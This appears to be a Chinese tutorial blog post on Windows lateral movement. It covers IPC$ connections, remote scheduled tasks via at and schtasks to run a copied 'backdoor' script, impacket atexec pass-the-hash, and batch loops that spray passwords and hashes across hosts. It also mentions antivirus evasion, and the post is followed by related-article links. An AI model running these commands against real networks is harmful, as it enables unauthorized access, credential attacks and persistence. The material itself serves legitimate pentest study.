内网渗透-横向移动($IPC&at&schtasks)
内网渗透-横向移动
#建立ipc连接并将后门添加至计划任务
前置条件:获取到某域主机权限->得到明文或者hash,通过信息收集到的用户列表当做用户名字典->用得到的密码明文当做密码字典
本次移动流程:尝试建立连接(ipc)->创建计划任务(at|schtasks)->执行命令,上传后门
什么是IPC?
IPC(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
#建立ipc常见错误代码
5:拒绝访问,可能需要提权
52:网络问题
53:端口未开放,未开机,防火墙拦截
67:本地lanmanworkstation服务未启动,目标删除了ipc$
1219:提供的凭据和已存在的凭据集冲突,说明已经建立ipc$,需要先删除
1326:账号密码错误
1792:目标NetLogon服务未启动
2242:用户密码过期,目标有账号策略,强制定期更改密码
#失败的原因
目标系统不是NT或者以上的操作系统
对方没有打开ipc$
139 445端口未开启或被拦截
输出命令,账号密码错误
建立ipc连接利用流程
1.建立ipc链接到目标主机(前提主机开放135 445端口)
工作组环境:
net use \\192.168.xx.xx\ipc$ "password" /user:"administrator"
域内环境:
net use \\192.168.xx.xx\ipc$ "password" /user:xxx.com\"administrator"
2.拷贝要执行的命令脚本到目标主机
copy \\192.168.xx.xx\c$\1.bat 1.bat
copy 1.bat \\192.168.xx.xx\c$ dir \\192.168.x.xx\c$\ #查看目标主机文件
3.查看目标时间,创建计划任务(at,schtasks)定时执行拷贝到的脚本
net time \\192.168.xx.xx #查看时间
at在windows版本小于2012下使用
at \\192.168.xx.xx 15:32 c:\1.bat #在15:32执行c盘下的1.bat
schtasks 在windows版本大于等于windows2012下使用
shctasks /create /s 192.168.xx.xx /run "system" /tn adduser /scDAILY /tr c:\1.bat /F #创建adduser任务对应批处理脚本 schtasks /run /s 192.168.xx.xx /tn adduser /i #运行adduser任务 schtasks /delete /s 192.168.xx.xx /tn adduser /f #删除adduser任务
4.删除ipc连接
net use \\192.168.xx.xx\ipc$ /delete net view xx.xx.xx.xx #查看对方共享
#利用atexec-impacket进行明文或hash传递
atexec.exe ./administrator:Admin12345@192.168.xx.xx "whoami" #连接本地用户administrator
atexec.exe xxx.com/administrator:Admin12345@192.168.xx.xx "whoami" #连接域用户administrator
atexec.exe -hashes:xxx ./administrator@192.168.xx.xx "whoami" #连接本地用户administrator并进行hash传递执行whoami命令
缺点:由于是第三方工具容易被拦截,需要做免杀处理
#批量利用
#bat批处理命令
For /F %%i in (ips.txt) do net use \\%%i\ipc$ "password" /user:administrator
#单个密码尝试连接多个主机
For /F %%i in(ips.txt) do atexec.exe xxx.com/administrator:password@%%i whoami
#调用atexec.exe用单个密码尝试连接多个主机
For /F %%i in (pass.txt) do atexec.exe xxx.com/administrator:%%i@192.168.xx.xx whoami
##调用atexec.exe用多个密码尝试连接单个主机
For /F %%i in (hash.txt) do atexec.exe -hashes:%%i xxx.com/administrator@192.168.xx.xx whoami
##调用atexec.exe用多个HASH尝试连接单个主机
内网渗透-横向移动($IPC&at&schtasks)的更多相关文章
- 4. 内网渗透之IPC$入侵
IPC$连接 IPC$的概念: IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限 ...
- 内网渗透之IPC,远程执行
开启服务 net start Schedule net start wmiApSrv 关闭防火墙 net stop sharedaccess net use \\目标IP\ipc$ "&qu ...
- [原创]K8 Cscan 3.6大型内网渗透自定义扫描器
前言:无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率漏洞时效性1-2天,扫描内网或外网需1 ...
- 内网渗透技巧:判断机器真实外网IP的5种方法总结
在内网渗透中有时需要在某台WEB服务器中留下后门,该机器可以通过内网IP建立IPC连接,但还需要获知外网IP或域名才能访问Wbshell,在无网关权限的情况下,我总结了有如下方法: 1.通过nsloo ...
- 5.内网渗透之PTH&PTT&PTK
---------------------------------------------- 本文参考自三好学生-域渗透系列文章 内网渗透之PTH&PTT&PTK PTH(pass-t ...
- 内网渗透 - 提权 - Windows
MS提权 MS16- MS16- 提权框架 Sherlock 信息收集 ifconfig -a cat /etc/hosts arp -a route -n cat /proc/net/* ping扫 ...
- 内网渗透之vlunstack靶场
前言:vlunstack靶场是由三台虚拟机构成,一台是有外网ip的windows7系统(nat模式),另外两台是纯内网机器(外网ping不通),分别是域控win2008和内网主机win2003,这里就 ...
- 内网渗透测试思路-FREEBUF
(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...
- 内网渗透 关于GPO
网上有很多讲内网渗透的文章,但看来看去还是一老外的博客给力,博客地址:www.harmj0y.net/blog,看完就明白这里面的很多思路都非常好. 做内网时,有时会碰到目标的机器开防火墙,所有端口基 ...
随机推荐
- 基金 A 类和 C 类、ETF、LOF、QDII 到底是啥?
ETF 对于初入股市的新手来说,买了一只公司股票容易,想买一个行业的股票就不是很容易了. 比如你要懂得行业里都有谁,每个公司分配多少钱,最主要股票交易最少要交易 1 手也就是 100 股,要是想配置一 ...
- 国产mcu理论数据评估工作记录
目录 前言 简要工作记录 前言 时间:20210315 主要记录这两天对国内各IC厂商的 MCU 了解记录. 大环境,ST 厂商 MCU 疯狂涨价,国内 MCU 也越来越完善,还便宜.同时,全球缺晶圆 ...
- java例题_47 读取 7 个数(1—50)的整数值,每读取一个值,程序打印出该值个数的*
1 /*47 [程序 47 打印星号] 2 题目:读取 7 个数(1-50)的整数值,每读取一个值,程序打印出该值个数的*. 3 */ 4 5 /*分析 6 * 1.多次读取---for循环 7 * ...
- 「HTML+CSS」--自定义加载动画【010】
前言 Hello!小伙伴! 首先非常感谢您阅读海轰的文章,倘若文中有错误的地方,欢迎您指出- 哈哈 自我介绍一下 昵称:海轰 标签:程序猿一只|C++选手|学生 简介:因C语言结识编程,随后转入计算机 ...
- Mybatis-plus 下
Mybatis-plus 下 查询操作 1.查询单个用户 @Test public void testSelectById(){ User user = userMapper.selectById(1 ...
- 如何自己设计一个类似dubbo的rpc框架?
(1)上来你的服务就得去注册中心注册吧,你是不是得有个注册中心,保留各个服务的信息,可以用zookeeper来做,对吧 (2)然后你的消费者需要去注册中心拿对应的服务信息吧,对吧,而且每个服务可能会存 ...
- @Scheduled注解
1 概述 @Scheduled注解是spring boot提供的用于定时任务控制的注解,主要用于控制任务在某个指定时间执行,或者每隔一段时间执行.注意需要配合@EnableScheduling使用,配 ...
- SpringCloud-微服务架构编码构建
SpringCloud Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智能路由,微代理,控制总线).分布式系统的协调导致了样板模式, ...
- 手机改 user模式为debug模式
logcat 是Android中一个命令行工具,可用于监控手机应用程序的log信息.网上相关的教学很多,这里只想把自己折腾 2 部手机(一个是三星S4 I9500 港水,Android 5.01,一个 ...
- 我为Dexposed续一秒——论ART上运行时 Method AOP实现
转载于:http://weishu.me/2017/11/23/dexposed-on-art/ 两年前阿里开源了 Dexposed 项目,它能够在Dalvik上无侵入地实现运行时方法拦截,正如其介绍 ...